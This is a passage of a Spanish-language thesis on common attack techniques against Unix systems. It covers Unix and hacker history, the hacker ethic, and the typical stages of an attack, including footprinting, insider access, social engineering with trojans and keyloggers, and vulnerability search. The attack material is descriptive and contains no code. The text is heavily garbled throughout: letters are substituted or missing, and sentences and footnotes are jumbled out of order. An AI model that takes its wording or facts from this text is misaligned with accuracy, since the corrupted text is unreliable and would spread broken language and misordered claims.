7lustraci8n 1% Ma"a l8gico de la A<!A@et ( Marzo de *0++ SCKBPE?T Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O de 22O

Ca")tulo *. ( *.1.A"arecen 2ni9 ' las

inico "utadoras

el correo electr8nico# los /oros de discusi8n ;2senet># la trans/erencia de arc$ivos ' $asta tr/ico de voz. 2ni9 /ue un suceso "orque el lenguaje C# aBos s tarde# a /ines de los M+.# 'a $ab)a sido i "le entado en in/inidad de "lata/or as ' con/iguraciones de $ardIare distintas# "or su sencillez# /le9ibilidad ' velocidad# lo cual $izo que 2ni9 is o ;a esa altura# con varios aBos de desarrollo enci a> ' el so/tIare escrito "ara l /uera posi(le ejecutarlo en todo lu)ar donde un compilador / existiese.

7lustraci8n 5% Arbol de las di/erentes versiones de 2ni9 a lo largo del tie "o S47R7U:7@T. Ler ta bin otro rbol gr/ico aGn s co "leto en S47R7U2AT

2n buen eje "lo de esto se dio a /ines de los M+.# cuando 5EC lanz8 la arquitectura BAC# que se diseBo co o e9tensi8n ' evoluci8n a -2 bits de la anterior !5!(**. F$o as B. :ondon ' Jo$n F. <eiser escribieron un docu ento al res"ectoS2ni9-2vT de donde la siguiente /rase resu e el trabajo de llevar 2ni9 a la LAA# lla ado 2ni9&-2L% C%ork on t e & compiler began in mid'(ecember
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0 de 22O

Ca")tulo *. ( *.1.A"arecen 2ni9 ' las

inico "utadoras

)*++, - e ard.are arrived on /arc 0, %e eld a part1 on /a1 )* to celebrate successful multiuser operation of t e s1stem, D ;CEl trabajo en el co "ilador C co enz8 a ediados de 5icie bre de *0++. :a quina lleg8 el - de Marzo. Fuvi os una /iesta el *0 de Ma'o "ara celebrar el e9itoso /unciona iento ultiusuario del siste aD>. Eje "los co o este*1 su"usieron un gran ca bio de "aradig as en la in/or tica% todo so/tIare escrito "ara 2ni9 "odr)a correr en di/erentes "lata/or as# en cualquier lu)ar. =asta ese antes ! un despus de Unix ! el len)uaje /. o ento# el so/tIare era alta ente de"endiente de la arquitectura en la cual se ejecutaba. Es "or esto que 9u(o un

*1 El trabajo tal co o se lo describe no a"rovec$aba co "leta ente la nueva arquitectura LAA# "ero es una uestra de lo relativa ente si "le que era llevar un siste a o"erativo ' su conjunto de $erra ientas a nuevas arquitecturas. !osterior ente# en *0+0# estudiantes de la 2niversidad de Ber6ele' "ublicaron -B,5 ;B,5 "or Ber6ele' ,o/tIare 5istribution># que era una versi8n de 2ni9&-2L que a"rovec$aba co "leta ente las nuevas ca"acidades de la LAA. 5e aqu) en nivel global. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *. de 22O s# la 2niversidad de Ber6ele' /ue una de las versiones de re/erencia de 2ni9 a

Ca")tulo *. ( *.5.:as

icroco "utadoras% Co "utadoras !ersonales

*.5. :as

icroco "utadoras% Co "utadoras !ersonales


itad de los aBos M+.# la iniaturizaci8n de los e oria# enor

!or otra "arte# en la segunda

co "onentes necesarios "ara crear un equi"o de c8 "uto ;"rocesador#

edios de al acena iento# etc.> "er iti8 que una nueva corriente de j8venes e9"ertos se interesara "or crear dis"ositivos "oderosos ' /le9ibles en el ta aBo "osible% se las deno in8 microcomputadoras "ri ero ' 9ome computers ;co "utadoras Cde casaD> o personal computers ;co "utadoras "ersonales> des"us. !equeBos clubes de /anticos ;Hobb1ists &lubs2 de la electr8nica ' co "utaci8n co enzaron a surgir# aco "aBados "or el es"acio dedicado en las "ublicaciones co o Popular 3lectronics, El Homebre. &omputer &lub
S47R7U=CCT

/ue la cuna

s relevante de estos $ac6ers# ' desde all)# A""le /ue la

"ri era e "resa conocida ' abocada a "roducir siste as de este ti"o# con ,teve 4oznia6 ' ,teve Jobs a la cabeza. Bill Pates ' !aul Allen# si bien no /ueron ie bros de este club# /ueron "arte de esta corriente ' desarrollaron su "ri er ' e9itoso "roducto% el lenguaje 4ltair 5asic# que se volvi8 el lenguaje estndar "ara la "rogra aci8n de las icroco "utadoras. Cali/ornia, ,in e bargo# vale la "ena dejar en claro que este nuevo ovi iento estaba u' in/luenciado "or la "osibilidad de $acer negocios con las e "resas tradicionales ' llevar la co "utaci8n a la gente no tcnica# ' aqu) no todos sus ie bros "ertenec)an a la co unidad $ac6er clsica# "or su cultura# tica ' co "orta iento. !or eje "lo# so=t@are# tanto "ara uc$os estaban en contra de compartir el ejora co o investigaci8n# ' eran "artidarios de crear un En los aBos subsiguientes este gru"o de $ac6ers ' sus e "rendi ientos dieron origen al conocido Silicon Valle1 ;Lalle del ,ilicio># en

odelo de licencias ' so"orte e "resarial# cerrando el ca ino a la innovaci8n co o se ven)a dando "or los CviejosD $ac6ers.

*.J. :os aBos MO.# M0. ' el F:?,,


En resu en# a "rinci"ios de los aBos MO.# la co unidad de e9"ertos de la co "utaci8n estaba dividida en di/erentes corrientes ' tecnolog)as%

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. ** de 22O

Ca")tulo *. ( *.J. :os aBos MO.# M0. ' el F:?,,

a> :os $ac6ers del 7F, ' las !5!(*.. b> :os $ac6ers de 2ni9# el lenguaje C# ' las !5!(**&LAA. c> :os $ac6ers de las co "utadoras "ersonales. :os aBos MO. transcurrieron entre uc$)si os ca bios ' avances ezclados ostrar sus aBos#

tecnol8gicos. ,i bien los $ac6ers del 7F, ' las !5!(*. 'a estaban algo con los de 2ni9 ' las !5!(**# 'a que su tecnolog)a e "ezaba a conocido co o el C!ro'ecto JG"iterD.

ta bin es"eraban ansiosa ente la nueva encarnaci8n co "atible de la !5!(*.# !ero no result8 co o es"eraban. A "esar de que estaba en buena /or a# en *0O- 5EC cancel8 el "ro'ecto# "ara concentrarse Gnica ente en la l)nea LAA de inico "utadoras# que 'a era i "le entaci8n ' 9ito. ?tro u' redituable econ8 ica ente# ' con aBos de otivo de 5EC acerca de esto /ue que un sucesor ercado '

de la !5!(*. ter inar)a co "itiendo con LAA# con/undiendo al is o so/tIare ' "ro'ectos que los nucleaba no era "ortable.

dividiendo sus es/uerzos. Esto signi/ic8 el /in del 7F, ' su cultura# 'a que el As) /ue co o el siste a o"erativo B,5 2ni9 sobre la arquitectura LAA# conectada a la A<!A@et ;'a aislada de entidades aBos la a'or)a de los $ac6ers del "ri er gru"o /ueron ilitares ' utilizando el igrando a l. "rotocolo FC!&7!># /ue el siste a de $ac6eo C por excelenciaDSE<==T# ' con los ,in e bargo# el que alcanz8 el 9ito /ue la tercera corriente tecnol8gica# con sus "roductos alcanzando la co "leta vertiginosa# asividad# /a a ' /ortuna ;"or eje "lo# la u' !C de 7BM ' el M,(5?,># con sus co "aB)as creciendo en /or a resto ;$ec$o conocido co o la CPuerra de los 2ni9DS47R7U24T>. ,in e bargo# es de destacar que segGn Eric <a' ond SE<==T# si bien $acia /ines de los MO. los entusiastas de las 8rdenes de icroco "utadoras crecieron en varios agnitud con res"ecto a la cultura $ac6er# nunca se convirtieron en

ientras que 2ni9 se debat)a entre la versi8n de AFWF# la B,5 ' el

una comunidad con conciencia propia. @unca desarrollaron una tradici8n co Gn de jerga# /olclore ' $istoria en co Gn. Liendo que 2ni9 estaba siendo disgregado# co ercializado "or grandes e "resas co o so/tIare cerrado ;"ro"ietario> ' de este odo "erdiendo su ClibertadD ;as) vista "or l># <ic$ard ,tall an cre8 el "ro'ecto P@2 SP@2T en *0O' la F,FSF,FT en *0O5 ;Free Soft.are Fundation# Fundaci8n de ,o/tIare :ibre>.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2 de 22O

Ca")tulo *. ( *.J. :os aBos MO.# M0. ' el F:?,,

El "ro'ecto P@2 a"untaba a crear una "lata/or a ;,iste a ?"erativo ' conjunto de utilidades> de so/tIare co "atible con 2ni9 de libre uso# las dcadas anteriores*5. Ka en los aBos M0.# el "ro'ecto P@2 ten)a uc$as $erra ientas desarrolladas# e9tendidas ' de calidad# "ero segu)a /altando un nGcleo "ara su ,iste a ?"erativo# 'a que se segu)a de"endiendo de versiones co erciales de 2ni9 "ara utilizarlas. Cuando lleg8 el o ento en que las !Cs /ueron su/iciente ente "oderosas# era cuesti8n de tie "o el que algGn conjunto de $ac6ers llevara una versi8n de 2ni9 a esta "lata/or a tan e9tendidaH as) /ue co o :inus ForvaldsS47R7U:FT desarroll8 :inu9SRernT# junto a un nG ero cada vez a'or de $ac6ers# sie "re con la red de "or edio. a'or# ' aun8 a un Linux =ue el comien3o del resur)imiento de la comunidad 9ac:er . El ,o/tIare :ibre ;F:?,,> /ue creciendo a un rit o cada vez nG ero creciente de $ac6ers alrededor del Co o conclusi8n# lo undo. odi/icaci8n ' distribuci8n# tal co o la co unidad $ac6er estaba acostu brada a $acerlo durante

s i "ortante del ca ino recorrido $asta aqu) es que

varias )eneraciones de 9ac:ers nacieron ! crecieron conectados a la red DAR4ANet al principio e Internet lue)oE% ! el o(jeto de su actividad creativa ! de investi)aci-n )ira(a alrededor ! )racias a ella . La red los uni-% los 9i3o crecer% desarrollarse% aprender% compartir% es decir% ser 9ac:er si)ni=ica en cierta =orma >estar? en la red aportando al)o a ella. Es "or eso que el $ac6er est tan asociado e identi/icado con el a"rovec$a iento ' e9"lotaci8n de vulnerabilidades# la obtenci8n de in/or aci8n re ota# investigaci8n de dis"ositivos conectados# es decir# 9ac:ear en la red.

*5 Cabe resaltar que ,tall an "ertenec)a a la generaci8n de $ac6ers del 7F, ' de las !5!(*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *- de 22O

Ca")tulo 2. ( Ca")tulo 2. El Ataque de siste as in/or ticos

/ap6tulo +. Fl Ataque de sistemas in=ormticos


2.*. El @egocio de la ,eguridad en la Actualidad
Foda 9erramienta poderosa co o un equi"o de c8 "uto "uede ser u' necesaria ' Gtil "ara tareas con /inalidades co o la investigaci8n# ad inistraci8n# diseBo# todos objetivos que contribu'en al desarrollo de un objeto de estudio. !ero ta bin puede ser empleada con =ines no ticos # co o "or eje "lo el desarrollo de ar as ' co "onentes qu) icos daBinos "ara el ser $u ano. =o' en d)a# atacar un siste a o equi"o in/or tico# es visto co o algo decidida ente C aloD "or uc$a gente ajena a la in/or tica. ,in e bargo# co o anera de "robar la robustez ' la otivos># no de co "robar la u' baja se $a descri"to anterior ente# desde los inicios de la co "utaci8n# atacar o vulnerar equi"os era considerado co o una escalabilidad de un siste a ;entre seguridad en s) del uc$os otros

is oH las redes e9ist)an# "ero eran "ocas ' de

velocidad. :os grandes co "utadores do inaban la escena de las cor"oraciones ' la con=ian3a en el so/tIare que se ejecutaba ' en las redes ' actores que coo"eraban era al)o com'n# que se daba "or sentado. XVu es lo que ca bi8# que $o' en d)a los delitos in/or ticos ;o la idea de que> son tan co unesY Muc$o. Al e9tenderse la tecnolog)a ;e 7nternet en los Glti os aBos> en el creando virus# undo# la se)uridad en (ase a la con=ian3a =ue dejando paso al so=t@are especiali3ado% expertos en se)uridad in=ormtica ! crac:ers alIare# atacando siste as en l)nea ' robando in/or aci8n '&o ercado de la seguridad in/or tica undo ' no tiene l) ites dinero de los usuarios o de las e "resas. El visibles a ediano "lazo.

est viviendo una eta"a de gran creci iento en todo el

2.2. El =ac6ing Etico


5esde el "unto de vista estricta ente de la co unidad in/or tica# la e9"eri entaci8n e investigaci8n# el >9ac:eo?% est (ien visto% siempre ! cuando la actividad respete la tica 9ac:er. :a tica $ac6er se basa en estos "rinci"ios# introducidos "or ,teven :ev'
S:ELKU=ACRT#

en *0O1%

Access to computers and anything which might teach you something about the way the world works should be unlimited and total. Always

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1 de 22O

Ca")tulo 2. ( 2.2. El =ac6ing Etico

yield to the Hands-On Imperative! % El acceso a las co "utadoras ' cualquier cosa que "ueda enseBarle algo acerca de c8 o /unciona el undo deber)a ser ili itado ' total. ,ie "re r)ndase al i "erativo de CZManos a la ?bra[D. C:os $ac6ers creen que las lecciones esenciales acerca de los siste as ' del undo "ueden ser a"rendidas aislando las cosas# viendo c8 o s /uncionan# ' utilizando este conoci iento "ara crear nuevas ' $asta

interesantes cosas. Ellos se o/enden de cualquier "ersona# barrera /)sica# o le' que intente evitar que ellos $agan esto.D S...T C:as reglas que le i "idan to ar las cosas de esta /or a en sus "ro"ias rid)culas "ara siquiera res"etarlas.D

anos son de asiado

All information should be free% Foda la in/or aci8n deber)a ser libre. Es decir# todo e9"eri ento e investigaci8n deber)a ser "Gblica ' de libre conoci iento# as) co o sus resultados. C,i usted no tiene acceso a la in/or aci8n que necesita "ara ejorar las cosas# XC8 o "uede arreglarloYD S...T CEsto evita el te eroso ritual de la "rdida de tie "o reinventando la rueda% en vez de que todos escriban su "ro"ia versi8n del is o "rogra a# la ejor versi8n estar)a dis"onible "ara todos# ' todos ejorar eso.D deber)an ser libres de "ro/undizar en el c8digo '

Mistrust Authority !romote "ecentrali#ation% 5escon/)a de la autoridad# "ro ueve la descentralizaci8n. C:a ejor anera de "ro over el libre interca bio de in/or aci8n es teniendo un siste a abierto# algo que no "resente l) ites entre un $ac6er ' una "ieza de in/or aci8n o un ele ento de un equi"a iento que necesita en su bGsqueda del conoci iento# ejora ' tie "o en l)nea. :a Glti a cosa que necesita es burocracia. :as burocracias# sean cor"orativas# del gobierno o universitarias# son siste as de/ectuosos# "eligrosos# de anera que no "ueden ada"tarse al i "ulso e9"loratorio de los verdaderos $ac6ers.D

Hackers should be $udged by their hacking not bogus criteria such as degrees age race or position% :os $ac6ers deber)an ser juzgados "or lo que $acen ;$ac6ear># no "or /alsos criterios co o t)tulos# edad# raza o "osici8n. C:a gente que acced)a ;a donde estba os> ' que "arec)an ostrar credenciales i "resionantes no eran to adas en cuenta seria ente $asta que se "robaban a s) is os en la consola ; ver "g. +# nota al "ie nro.*2>

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5 de 22O

Ca")tulo 2. ( 2.2. El =ac6ing Etico

de una co "utadora. Este rasgo meritocrtico no est necesaria ente basado en la bondad in$erente de los corazones de los $ac6ers# sino que "rinci"al ente les i "orta "otencial de

enos sus caracter)sticas su"er/iciales que su

ejorar el estado general del $ac6ing...D s corto deber)a ser ad irado

%ou can create art and beauty on a computer % 2sted "uede crear arte ' belleza en una co "utadora.DEl "rogra a "or co "aBeros $ac6ersDS...T C=a' de/initiva ente un i "ulso art)stico dentro de aquellos que "ueden utilizar esta tcnica de genio( arciano# de una calidad visionaria que los $abilita a descartar el "unto de vista actual ' establecer# de una /or a total ente ines"erada# un nuevo algorit oD. &omputers can change your life for the better % :as co "utadoras "ueden ca biar su vida "ara ejor. 'ike Aladdin(s lamp you could get it to do your bidding % Co o la l "ara de Aladino# usted "uede so eter a la co "utadora co "leta ente a sus 8rdenes. C,egura ente cualquiera "odr)a bene/iciarse al e9"eri entar este "oder. ,egura ente cualquiera "odr)a bene/iciarse de un undo basado en la Etica =ac6er. Esta era la creencia i "l)cita de los $ac6ers...D. =a' otra "ublicaci8n s reciente# que vale la "ena citar# donde el iran C"uertas adentroD '

is )si o :inus Forvalds junto a otros escritores se e9"lican la

otivaci8n de los $ac6ers ' su co unidad# su /or a de ver las cosas '

su tica% C- e Hacker 3t ic and t e Spirit of t e 6nformation 4ge DS=ACRUEF=7CT ;C:a Etica =ac6er ' el Es")ritu de la Era de la 7n/or aci8nD>. En resu en# si bien en *0O1# cuando estos "rinci"ios $asta ese con el "ro'ecto P@2H la Etica =ac6er 'a estaba "resente en la =ac6er ' en "rctica durante alrededor de 25 aBos# dieron origen al del ,o/tIare :ibre de $o' en d)a. Fa bin sus tecnolog)as i "ortant)si as aGn en nuestros d)as ;' el "rotocolo FC!&7!# Et$ernet# C ' 2ni9 o ento tcitos /ueron "uestos en "a"el ' <ic$ard ,tall an recin co enzaba su cruzada a'or)a de la ovi iento co unidad de e9"ertos in/or ticos. Estos "rece"tos# /ruto de la lla ada Cultura ie bros desarrollaron

u' usadas "or cierto># co o uc$)si as tcnicas

is o. :os tests de "enetraci8n

;Cpenetration testingsD># los exploits# la ingenier)a reversa# ' $ac6ers $ace s de 2. aBos.

s que estarn o no "resentes en este docu ento /ueron desarrolladas "or

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J de 22O

Ca")tulo -. ( Ca")tulo -. Eta"as F)"icas de un Ataque

/ap6tulo ;. Ftapas T6picas de un Ataque


2na vez descri"tos los or)genes ' las intenciones de los $ac6ers# se "uede co enzar a describir el t)"ico ' genrico "roceso de vulnerar la in/raestructura in/or tica de una entidad. Cabe resaltar que e9isten in/initas se "ueden describir las siguientes eta"as% aneras ' co binaciones de $acerlo# donde si bien no todas recorren este ca ino# en general

7lustraci8n J% Eta"as \t)"icas\ de un Ataque

Co o "uede verse en la ilustraci8n# los ataques a deter inados siste as suelen ser "lani/icados# es decir% el atacante en "ri era instancia busca un cierto objetivo# luego obtiene in/or aci8n general de la estructura de red# versiones de so/tIare# etc. ' "osterior ente utilizar una estrategia# a"licando una o general ente varias tcnicas "ara vulnerar el siste a. !robable ente en algGn o ento busque algo de anoni ato "ara $acer sus quinas intro isiones# "or eje "lo utilizando una red "Gblica# un ejrcito de

C$ombieD# uno o varios siste as inter edios# o un siste a interno ;es decir# desde dentro de la organizaci8n> desde donde co "ro eter a otros siste as internos. :uego# segGn se desee# se "ueden li "iar los rastros# o recurso obtenido antener el control del ediante C"uertas traserasD o rootkits# ' luego a"rovec$ar el

siste a co "ro etido "ara CsaltarD a otro objetivo ;quizs# el objetivo original>. Es i "ortante re arcar que esta tendencia de ataques "lani/icados ' "ersonalizados se encuentra en au ento# debido a la creciente di/icultad de encontrar una Gnica anera de vulnerar un siste aH la red es cada vez s $eterognea ' evidente ente la /alsa sensaci8n de seguridad de $ace algunos aBos oblig8 a que los ad inistradores de siste as ' "rogra adores tuvieran co o
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+ de 22O

Ca")tulo -. ( Ca")tulo -. Eta"as F)"icas de un Ataque

a'or "rioridad la tolerancia a /allos# esque as de seguridad# bac6u" ' e ergencia# "or no brar algunas edidas co unes. ,egGn el ,A@,*J# "ara el aBo 2..+ los ataques in/or ticos con objetivos bien de/inidos ' "lani/icados se encuentran en el cuarto "uesto dentro un in/or e acerca de las *. tendencias
S,A@,UF?!*.T.

s i "ortantes en cuanto a seguridad del 2..+

K agrega*+% C:os ciber(ataques dirigidos de naciones en contra de los siste as de gobierno de los Estados 2nidos $an sido enor e ente e9itosos en los Glti os tres aBos# de ostrando el /racaso del gobierno /ederal en cuanto a actividades de seguridad. S...T :os ataques "lani/icados a organizaciones co erciales se dirigirn a contratistas valiosa de sus clientesD. ilitares ' negocios con in/or aci8n u'

-.*. !lani/icaci8n ' elecci8n del objetivo


Co o se dijo antes# la tendencia actual de los ataques a entidades es que se "lani/ican "revia ente# no son al azar. ,in e bargo# es bueno destacar que# de acuerdo a la "lani/icaci8n que se $aga# "uede que el ataque s) involucre ele entos s o enos aleatorios# co o "or eje "lo# el ar ado de redes de quinas Czo biesD "revio Crecluta ientoD de usuarios de internet incautos# "ara luego s) dirigirlos a un objetivo en concreto. Fa bin es "robable que "ara llegar al CobjetivoD "rinci"al# se va'an obteniendo ciertos "rivilegios a lo largo del ca inoH es enos custodiados ' uc$o s co Gn que tenga 9ito un ataque "lani/icado# basado en conquistar objetivos secundarios# s vulnerables# "ara luego ir "or el Cgran "re ioD.

-.2. ?btenci8n de in/or aci8n


A esta eta"a ta bin se la suele deno inar Csegui iento de $uellasD ;footprinting># 'a que co o bien se "uede su"oner# se trata de una averiguaci8n
*J ,A@, 7nstitute % A'sAd in# Audit# NetIor6ing# and Aecurit' ;7nstituto de Ad inistraci8n de ,iste as# Auditor)a# <edes ' ,eguridad>. $tt"%&&III.sans.org&. Es un instituto reconocido en todo el undo es"ecializado en ,eguridad 7n/or tica. *+ C1. -argeted c1ber attacks b1 nation states against US government s1stems over t e past t ree 1ears ave been enormousl1 successful, demonstrating t e failure of federal c1ber securit1 activities, 7,,,8 -argeted attacks on commercial organi$ations .ill target militar1 contractors and businesses .it valuable customer information,D Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *O de 22O

Ca")tulo -. ( -.2.?btenci8n de in/or aci8n

no intrusiva de todos los as"ectos tcnicos# $u anos ' culturales de la organizaci8n. Fa bin algunos e9"ertos la deno inan C<econoci iento !asivoD ;9Passive :econnaissance;2# ' resaltan su i "ortancia en todo el "roceso de ataque. ,egGn Eric Cole ;S=ACRUBE4T# "g. -J>% CEn algunos casos# el reconoci iento "asivo "uede "roveer todo lo que un atacante necesita "ara obtener acceso. En "ri era instancia "odr)a "arecer que no es tan Gtil# "ero no sobresti e la cantidad de in/or aci8n que un atacante "uede adquirir si es realizado correcta ente. :os ataques "asivos*O# "or naturaleza# "ueden no "arecer tan "oderosos co o los activos*0# "ero en algunos casos "ueden ser algo ejor% acceso garantizado entre varias avenidas2.D. s "oderosos. Con los ataques "asivos# usted no obtiene acceso directo# "ero a veces usted $asta obtiene

-.2.*. 5esde /uera de la organizaci8n


Peneral ente# la investigaci8n del objetivo suele co enzar s8lo teniendo acceso e9terno a la organizaci8nH es co Gn tratar de averiguar qu ecanis os de uc$as acceso se "ueden utilizar "ara intentar acceder a sus redes ' servicios# ' una vez all)# acceder al objetivo. @or al ente el acceso es s8lo v)a internet# "ero entidades "roveen ta bin acceso re oto% tele/8nico ;Cdial'upD># noteboo6s de e "leados que llevan trabajo a sus $ogares# redes Iireless ;estando cerca geogr/ica ente># etc. Es "or esto que toda in=ormaci-n acerca de la e "resa# "or eje "lo# tel/onos# direcciones# o/icinas# e "resas clientes# socios# "roveedores# no bres e in/or aci8n de e "leados ;o e9(e "leados># eventos# ' i "ortancia en esta "arte# donde e9clusiva ente se releva la in/or aci8n# "ara luego utilizarla en /or a intuitiva e ingeniosa. :as "rinci"ales /uentes de in/or aci8n acerca de una entidad son%

uc$o

s# son de

a'or cantidad de

&ases de Datos ;"Gblicas o no># dis"onibles en internet# o en

anos

*O Eric Cole utiliza Cataque "asivoD ' Creconoci iento "asivoD de /or a indistinta ' co o sin8ni os. 5e $ec$o# le da la categor)a de CataqueD a algo que es in/or aci8n# justi/icndolo tal co o se transcribe. *0 :os ataques activos se utilizan "ara re/erenciar la secci8n *.-.-. 2. CavenidasD en dic$a /rase es una et/ora de siste a&red "ro"ia de la organizaci8n. era ente una bGsqueda de

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0 de 22O

Ca")tulo -. ( -.2.?btenci8n de in/or aci8n

"rivadas a las que el atacante tiene accesoH "or eje "lo# el "adr8n de votantes de la Argentina es u' sencillo de conseguir en la red. K brinda in/or aci8n de Fi"o ' @G ero de 5ocu ento# 5irecci8n# @o bre co "leto# se9o# estado civil ' /ec$a ' lugar de naci iento# de cada votante de Argentina# que "ueden ser usados a anera de identi/icaci8n "or usuarios de siste as con acceso desde 7nternet.

1otores de &'squeda. Buscadores co o Poogle ' Ka$oo "er iten encontrar en segundos una criterio es"ec)/ico. Es ultitud de "ginas que coincidan con un s# los atacantes suelen a"rovec$ar varios

ele entos de bGsqueda dis"onibles en el buscador que co binados les "er ite au entar el /actor de 9ito de /or a considerable.

Ao=t@are especiali3ado. E9iste so/tIare que con a'uda de los dos ele entos anteriores co bina ' trans/or a un dato es"ec)/ico en una CredD de resultados "osible ente relacionados# con cierta inteligencia.

-.2.2. 5esde dentro de la organizaci8n


,i de alguna anera se tiene acceso desde dentro de la organizaci8n a los objetivosH es decir# teniendo "or eje "lo el control de alguna estaci8n de trabajo con o sin "er iso# desde donde se accede al siste a v)a red "or eje "lo# las "robabilidades de 9ito au entan considerable ente. @o es casual que el O.] de los ataques e9itosos "rovengan de una red interna al servicio que se co "ro ete
S=ACRUBA,7C,T.

:a ventaja est dada en que el siste a debe "er itir el acceso a

este nodo# a di/erencia de los que residen /uera de la red de la organizaci8n. Ade s de las "osibilidades de obtener in/or aci8n del "unto anterior# aqu) las "osibilidades se a "l)an sustancial ente# entre las encuentran%

s co unes se

Fscuc9ar2* tr=ico de otros componentes de la red. Acceder a la in=ormaci-n del equipo ! la que se encuentra disponi(le en vol'menes compartidos de la red % e( ails# docu entos# contraseBas# listados de usuarios# arc$ivos# bases de datos# registros# cualquier dato que "ro"orcione aneras de ingresar al siste a objetivo.

2* CEscuc$ar el tr/icoD

s co Gn ente se dice en la jerga Cesni/earD# 'a que el verbo en ingls

es Csni//D# que signi/ica C$us earD# u ColerD. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2. de 22O

Ca")tulo -. ( -.2.?btenci8n de in/or aci8n

-.2.-. 7ngenier)a ,ocial


:a ingenier)a social es quizs uno de los s di/)ciles ele entos de control "or "arte de las organizaciones# 'a que se a"rovec$a del co "onente $u ano# sie "re involucrado en alguna eta"a ;si no en todas> de la o"eraci8n de los siste as. Fal co o lo a/ir a el a/a ado $ac6er Revin Mitnic6 en su libro CEl arte del EngaBo N Controlando el Ele ento =u ano de la ,eguridadD SRMUA?5T# CFl =actor 9umano es verdaderamente el enlace ms d(il de la se)uridadD. :a ingenier)a social se "uede de/inir co o Ctodo atacante trata de "ersuadir# siste a objetivo# quizs acceder al objetivoD. 2na breve enu eraci8n de los

todo "or el cual un

ani"ular o engaBar a una "ersona relacionada con el enos estar s cerca de

intiendo ;o no># con el objetivo de quitarle algGn dato o

ele ento de in/or aci8n que "er ita acceder o al todos inclu'e%

:la adas tele/8nicas. Mensajes de te9to. ,esiones de c$at o dilogos v)a Env)o de correos electr8nicos. Lisitas "ersonales Env)o e 7nstalaci8n de "rogra as en !Cs de e "leados de la entidad# co o "or eje "lo%

ensajer)a instantnea.

,"'Iare% obtienen in/or aci8n de uso# $bitos# $istorial de navegaci8n# ' lo re"ortan a un sitio central. Fro'anos% 2n "rogra a del ti"o CCaballo de Fro'aD S47R7UF<?KT# es un "rogra a que a"arente ente cu "le cierta /uncionalidad# "ero que sin que el usuario lo se"a utiliza el equi"o con otros /ines. !uede ser utilizado "or el ingeniero social "ara instalar "uertas traseras ' conseguir acceso local a la red objetivo# instalar un 6e'logger# etc. 2n 6e'logger ca"tura las contraseBas ' todo lo que ti"ee el usuarioH "uede enviarlas a un sitio re oto o si el intruso tiene acceso local# llevarse el registro en edios de al acena iento "orttiles.

Peneral ente $acindose "asar "or otra "ersona# el atacante utiliza in/or aci8n obtenida anterior ente "ara "ersuadir a una "ersona de que le "rovea cierta in/or aci8n# o que se dirija a una "gina Ieb en "articular ' llene un
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2* de 22O

Ca")tulo -. ( -.2.?btenci8n de in/or aci8n

/or ulario# o que le env)e un /a9 con ciertos datos# etc. :as "osibilidades ' situaciones son casi in/initas# ' los estudios al res"ecto son alar antes "ara toda entidad "reocu"ada "or su seguridad S7,?CU,FAFT# donde se re/leja lo sencillo que es conseguir in/or aci8n s o enos sensible de la a'or)a de los usuarios. !ara eje "li/icar# un "osible intruso# "ara conseguir acceso a la estaci8n de trabajo de un e "leado de una e "resa# "odr)a enviarle "or correo tradicional a su escritorio un "en drive# C5# etc. de regalo# de alguna e "resa cliente# "ara que lo vea. :uego# el e "leado inserta el C5 dentro de la co "utadora de su trabajo ' ejecuta la "resentaci8n# que ade s de ostrarle la salutaci8n "ara "asar desa"ercibido# instala ta bin un "rogra a oculto que env)a in/or aci8n del equi"o al atacante v)a internet# to ando el control de su equi"o# ' sirviendo de "uerta de entrada a toda ;o "arte al enos de> la red de la e "resa.

-.-. BGsqueda ' rastreo de vulnerabilidades.


En esta eta"a es donde el atacante establece de /or a activa co unicaci8n con el objetivo# segura ente tratando de "asar desa"ercibido "ara el ad inistrador. 2sual ente se dis"one de un CarsenalD de $erra ientas "ara $acerlo# 'a que aGn no sabe con "recisi8n con qu se va a encontrar. Estas $erra ientas suelen desarrollarse "or gru"os de $ac6ers ' distribuidas "or 7nternet libre ente 22# a"rovec$ando alguna debilidad en "rotocolos# nor as u o"eratorias. Cuanta e9"eriencia tenga en el /unciona iento interno de los organizaci8n. is os# s s "robabilidad

tendr el intruso de "oseer# desarrollar o conseguir vulnerar la in/raestructura de la

-.-.*. Acceso :ocal


En cuanto a la bGsqueda de vulnerabilidades en /or a local# cabe destacar que si el atacante tiene acceso /)sico al objetivo ;un servidor# "or eje "lo> $abiendo sorteado el esque a de seguridad de la entidad# se considera que todo es=uer3o por prote)er la in=ormaci-n es en vano. Mic$ael Pregg ;S=ACRU,FACRT# "g. -J2> escribi8 sobre este te a% CCasi
22 ,i bien estas "iezas de so/tIare "ueden "arecer de Ctica dudosaD "ara ateria# en realidad suelen ser utilidad tanto "ara /ines continua e investigaci8n. @o $a' que olvidar esta idea del uc$a gente ajena a la ejora alos co o "ara /ines de de/ensa# undo $ac6er# la libertad.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 22 de 22O

Ca")tulo -. ( -.-.BGsqueda ' rastreo de vulnerabilidades.

cualquier otra "recauci8n "uede ser vencida "or un decidido atacante con "osesi8n /)sica de una co "utadora. Con/igurar "er isos de arc$ivos# establecer contraseBas de acceso# ' ocultando el Glti o no bre de usuario ' contraseBa utilizados "ara iniciar la sesi8n son todos intentos loables# "ero no van a /rustrar a un atacante e9"eri entadoD. As) ' todo# $a' (umpster diving uc$as $istorias ' tcnicas sobre bGsqueda activa de
7%6<6=(U/P8 %

debilidades de este ti"o que se distribu'en "or la red# co o "or eje "lo%

Consiste en

revolver la

basura

